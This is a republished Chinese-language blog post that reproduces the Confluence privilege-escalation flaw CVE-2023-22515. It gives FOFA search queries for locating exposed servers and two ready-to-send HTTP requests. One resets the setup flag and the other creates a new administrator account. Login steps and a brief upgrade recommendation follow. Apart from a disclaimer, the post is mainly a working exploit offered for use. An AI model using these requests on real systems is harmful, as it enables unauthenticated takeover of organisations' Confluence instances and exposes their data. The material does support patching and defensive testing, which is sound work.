CVE-2023-22515：Atlassian Confluence權限提升漏洞復現 [附POC]

文章目錄

Atlassian Confluence權限提升(CVE-2023-22515)漏洞復現 [附POC]
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影響版本
- 0x04 漏洞環境
- 0x05 漏洞復現
- - 1.訪問漏洞環境
  - 2.構造POC
  - 3.復現
- 0x06 修復建議

Atlassian Confluence權限提升(CVE-2023-22515)漏洞復現 [附POC]

0x01 前言

免責聲明：請勿利用文章內的相關技術從事非法測試，由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失，均由使用者本人負責，所產生的一切不良后果與文章作者無關。該文章僅供學習用途使用！！！

0x02 漏洞描述

Confluence是一個專業的企業知識管理與協同軟件，也可以用于構建企業wiki。使用簡單，它強大的編輯和站點管理特征能夠幫助團隊成員之間共享信息、文檔協作、集體討論，信息推送。

Atlassian Confluence Data Center 和 Confluence Server 存在權限提升漏洞，該漏洞由屬性覆蓋導致，未經身份驗證的遠程攻擊者可以重新執行 Confluence 安裝流程并增加管理員賬戶，從而訪問 Confluence 實例。

0x03 影響版本

Confluence Data Center、Confluence Server <= 8.0.4
Confluence Data Center、Confluence Server <= 8.1.4
Confluence Data Center、Confluence Server <= 8.2.3
Confluence Data Center、Confluence Server <= 8.3.2
Confluence Data Center、Confluence Server <= 8.4.2
Confluence Data Center、Confluence Server <= 8.5.1

0x04 漏洞環境

FOFA語法：app=“ATLASSIAN-Confluence”
根據版本精確查詢：

body="<span id='footer-build-information'>8.0.0</span>"

在這里插入圖片描述

0x05 漏洞復現

1.訪問漏洞環境

在這里插入圖片描述

2.構造POC

POC1：（GET）
覆蓋 Confluence 服務器 bootstrapStatusProvider.applicationConfig.setupComplete 屬性

GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

POC2：（POST）

開始新建管理員賬戶（請求頭添加：X-Atlassian-Token: no-check）

POST /setup/setupadministrator.action HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Content-Length: 107username=cs&fullName=cs&email=yj%40yjtest.com&password=cstest&confirm=cstest&setup-next-button=Next

3.復現

1.覆蓋 Confluence 服務器 bootstrapStatusProvider.applicationConfig.setupComplete 屬性，出現以下截圖屬性覆蓋成功。
在這里插入圖片描述 2.開始新建管理員賬戶（請求頭添加：X-Atlassian-Token: no-check）
出現以下截圖則添加成功。
3.直接用添加成功的賬號密碼登錄
重新訪問登錄主頁，點擊statr
使用新建的用戶名以及密碼登錄，成功登錄。

0x06 修復建議

更新 Confluence Data Center、Confluence Server 至安全版本：

https://www.atlassian.com/software/confluence/download-archives

安全版本

Confluence Data Center、Confluence Server >= 8.3.3
Confluence Data Center、Confluence Server >= 8.4.3
Confluence Data Center、Confluence Server >= 8.5.2

本文來自互聯網用戶投稿，該文觀點僅代表作者本人，不代表本站立場。本站僅提供信息存儲空間服務，不擁有所有權，不承擔相關法律責任。
如若轉載，請注明出處：http://www.pswp.cn/news/168022.shtml
繁體地址，請注明出處：http://hk.pswp.cn/news/168022.shtml
英文地址，請注明出處：http://en.pswp.cn/news/168022.shtml

如若內容造成侵權/違法違規/事實不符，請聯系多彩編程網進行投訴反饋email:809451989@qq.com，一經查實，立即刪除！